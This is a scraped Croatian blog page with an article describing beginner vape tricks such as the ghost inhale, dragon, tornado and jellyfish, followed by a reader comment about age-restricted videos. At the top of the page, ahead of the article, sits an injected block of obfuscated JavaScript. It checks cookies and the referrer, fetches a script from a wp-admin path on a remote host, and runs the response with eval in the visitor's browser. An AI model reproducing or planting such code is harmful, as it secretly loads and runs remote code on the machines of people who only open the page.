;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Vape trikovi za početnike

Vaping je stekao popriličnu popularnost u posljednjih nekoliko godina. Osim dokazanih činjenica da vape uređaji i para posjeduju manje štetna svojstva od tradicionalnih cigareta, možete izvesti razne cool vape trikove.

Ukoliko i vi želite pokušati izvesti neke od trikova koje ćete vidjeti u ovom članku, prvo provjerite imate li dobar vape mod i sub-ohm atomizer, jer će biti gotovo nemoguće izvesti bilo od njih s uređajima koji ne proizvode dovoljnu količinu pare.

Ghost Inhale

Ghost inhale je trik koji svatko može izvesti čak i iz prvog pokušaja, pa je savršena opcija za početnike koji tek uče svoje prve vape trikove.

Ghost Inhale možete napraviti tako da čim više pare uvučete u usta (ali ne udahnete u pluća), na trenutak zadržite paru u usnoj šupljini, a nakon toga pustite da izađe u obliku lopte.

Da biste to učinili, jednostavno morate otvoriti usta, malo ih ispružiti u obliku slova O, a zatim odmah zatvoriti.

Nemojte forsirati paru. Zadržite dah na sekundu. Pogledajte video kako biste vidjeli kako ovo izgleda u praksi.

The Dragon (Zmaj)

Zmaj je odličan vape trik kojim lako može impresionirati ostale vapere i oni koji to nisu. Pomalo je ekstravagantan jer doslovno čini da izgledate poput zmaja dok para izlazi iz vašeg nosa i kutova usta.

Sve što trebate učiniti je povući veću količinu pare, a zatim je silom izdahnite kroz nos i kroz oba kuta usta, pokušavajući čvrsto zatvoriti usne samo u sredini.

The Waterfall (Vodopad)

Vodopad je izvrstan trik za vape koji u osnovi pretvara paru u nešto nalik vodi koja teče iz boce.

Ovaj se trik izvodi uz pomoć boce sa smrznutom vodom na dnu.

Vapor Bubble (Balon pare)

Vapor bubble je trik koji stvara ogroman balon pare. Možete ga napraviti tako da zarobite izdahnutu paru unutar mjehurića.

Sve što trebate učiniti je napraviti rez na dnu plastične boce i upotrijebiti mješavinu sapuna za ruke i vode.

Provjerite je li boca koju koristite relativno mala. Nakon toga spustite kraj boce u tekućinu, a zatim lagano izdahnite svoju paru.

Tornado

Ovo je jedan od najpopularnijih vape trikova, a izgleda upravo onako kako njegovo ime implicira.

Sve što trebate učiniti je pažljivo izdahnuti svoju paru, ali pazite da to radite na potpuno ravnoj površini, i imajte na umu da para mora biti prilično gusta.

Sljedeći korak je korištenje ruku na način koji ćete vidjeti u videu.

Liquid Mist (Tekuća magla)

Uz pomoć ovog trika možete stvoriti maglu koja ostaje na vrhu vašeg pića i čini da izgleda kao neka vrsta čarobnog napitka.

Uzmite čašu bilo kojeg hladnog pića, po mogućnosti širokog promjera (poput one za viski ili martini).

Kada je čaša napola puna, povucite čim više pare, a nakon toga dotaknite stakleni rub usnama kao kad pijete i polako izdahnite paru. Čarobno će ostati na vrhu tekućine.

Jellyfish (Meduza)

Ukoliko uspješno izvedete ovaj trik, vaša će para izgledati kao prava meduza koja lebdi u zraku!

Da biste radili meduzu, možda biste prvo željeli vježbati ispuhivanje pare u obliku slova O te zatim ovu paru povući prema naprijed stvarajući protok zraka dlanovima.

Nakon ovoga, izdahnite malo pare točno usred vašeg letećeg slova O.

Choose your Reaction!
  • Samo dodatan info za ove video klipove za koje piše da su “age restricted”. Njih možete uredno pogledati na youtube kanalu ako ste logirani svojim youtube ili google accountom i imate više od 18 godina. Naravno, ako vas google ili youtube od prije prepoznaju kao punoljetnu osobu…

Leave a Comment